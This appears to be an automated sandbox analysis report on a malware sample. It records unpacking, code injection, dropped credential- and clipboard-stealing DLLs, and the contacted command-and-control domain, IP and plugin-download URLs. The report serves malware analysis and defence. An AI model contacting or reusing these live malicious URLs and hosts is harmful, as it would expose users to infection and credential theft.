Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F14C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_048F14C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F21BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_048F21BF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427773 Sample: c92ec1cea5a09af2f334a2e0d12... Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 44 topgamecheats.dev 2->44 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 10 other signatures 2->54 8 c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe 5 2->8         started        12 Dctooux.exe 2->12         started        signatures3 process4 dnsIp5 34 C:\Users\user\AppData\Local\...\Dctooux.exe, PE32 8->34 dropped 56 Detected unpacking (changes PE section rights) 8->56 58 Detected unpacking (overwrites its own PE header) 8->58 60 Contains functionality to inject code into remote processes 8->60 15 Dctooux.exe 8->15         started        18 WerFault.exe 16 8->18         started        20 WerFault.exe 16 8->20         started        28 8 other processes 8->28 46 topgamecheats.dev 93.123.39.96, 49746, 49747, 49748 NET1-ASBG Bulgaria 12->46 36 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 12->36 dropped 38 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 12->38 dropped 40 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 12->40 dropped 42 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 12->42 dropped 22 WerFault.exe 12->22         started        24 WerFault.exe 12->24         started        26 WerFault.exe 12->26         started        30 3 other processes 12->30 file6 signatures7 process8 signatures9 62 Multi AV Scanner detection for dropped file 15->62 64 Detected unpacking (changes PE section rights) 15->64 66 Detected unpacking (overwrites its own PE header) 15->66 32 WerFault.exe 15->32         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.123.39.96
 topgamecheats.dev Bulgaria
43561 NET1-ASBG true

Contacted Domains

Name IP Active
topgamecheats.dev 93.123.39.96 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 true unknown
http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll true unknown
http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 true unknown
http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll true unknown
topgamecheats.dev/8bjndDcoA3/index.php true low
http://topgamecheats.dev/8bjndDcoA3/index.php true unknown